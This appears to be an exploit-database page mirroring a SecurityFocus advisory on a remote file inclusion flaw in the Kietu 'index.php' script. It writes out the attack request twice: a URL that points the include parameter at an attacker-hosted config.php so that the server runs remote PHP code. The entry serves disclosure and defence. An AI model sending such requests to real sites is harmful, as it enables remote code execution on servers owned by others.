header-logo
Suggest Exploit
vendor:
index.php
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include Vulnerability
98
CWE
Product Name: index.php
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Kietu ‘index.php’ Remote File Include Vulnerability

A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process. Issuing the URI request to the vulnerable server will facilitate remote attacker php script execution: http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/ Where the 'config.php' file must exist: http://[attacker]/config.php

Mitigation:

Ensure that the include path is properly configured and that the application is not vulnerable to remote file inclusion.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9499/info

A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process. 

Issuing the URI request to the vulnerable server will facilitate remote attacker php script execution:

http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/

Where the 'config.php' file must exist:

http://[attacker]/config.php

Navigation

Suggest Exploit

Services By CQR